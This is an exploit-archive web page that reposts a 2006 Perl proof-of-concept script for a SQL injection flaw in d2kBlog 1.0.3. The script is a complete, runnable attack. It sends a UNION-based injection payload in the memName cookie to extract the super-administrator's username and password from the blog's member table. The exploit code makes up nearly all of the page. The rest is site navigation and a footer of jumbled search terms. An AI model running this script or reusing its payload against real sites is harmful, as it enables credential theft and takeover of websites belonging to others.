about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit



2006-03-09 d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit
Rated as : High Risk

 #!/usr/bin/perl -w 
 # D2KBLOG SQL injection 
 # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
 # Exploited by : devil_box [ devil_box [at} kapda.ir ]
 # member of : Kapda.ir - Security Science Researchers Institute of Iran
(persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;
print
"\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print "	KAPDA - Security Science Researchers Institute of
Iran\r\n\r\n";
print "	PoC for D2KBLOG SQL injection bug - Administrator Password
Extractor\r\n\r\n";
print "	Original Source : http://kapda.ir/advisory-287.html
(persianhacker.net)\r\n\r\n";
print
"\r\n=-=-=-==================================================================-=-=-=\r\n";

 if (@ARGV != 2) 
 { 
    print "	Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable
Page]\n\r\n"; 
    print "	ex: kapda_D2KBLOG_xpl.pl www.target.com
/blog/profile.asp\n\r\n";
    exit (); 
 } 


my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive =>
1,timeout => 30,);

my $Path = $ARGV[0];

my $Page = $ARGV[1];

my $URL = "http://".$Path.$Page;

print "|***| Connecting to ".$URL." ...\r\n";

$r = HTTP::Request->new(GET => $URL."?action=edit");

$r->header( "Cookie"
=>$Path."=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->"
);

$res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {

	print "|***| Extracting Username and Password ...\r\n\r\n";

	my $results = $res->content; 

	while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print
"-=-> $1 \r\n"; }

	print "\r\n	Exploit by Devil_Box\r\n		Discovery by Farhad
koosha\r\n\r\n";

 } else {
	die "\r\n|***| ".$res->status_line;
 }


securitydot.net - 2006-03-09

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:38:56 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c php-nuke 2 gail crack news for c 1.3 perl e /search/ex *.jpg PHP 5.2.0 hjsy.www.s Www.indian Clerk resu play boy v news for c www.tamil news for c gapin gaysex.com naked gir search/exp www,sex,18 Mms clips maxcpm.inf sex movee phpbb %3f autosurf no bodys p Www sexi c school sex php-nuke 2 maxcpm.inf 200 /compo news for c history of www.tamils m...param. phpbb %3f www.yzlqq. phpbb %3f pet shop b Saxey www.worl dojo xxxpict javascript t995t www.fish23 news for c __921__Gue skyblog www.trish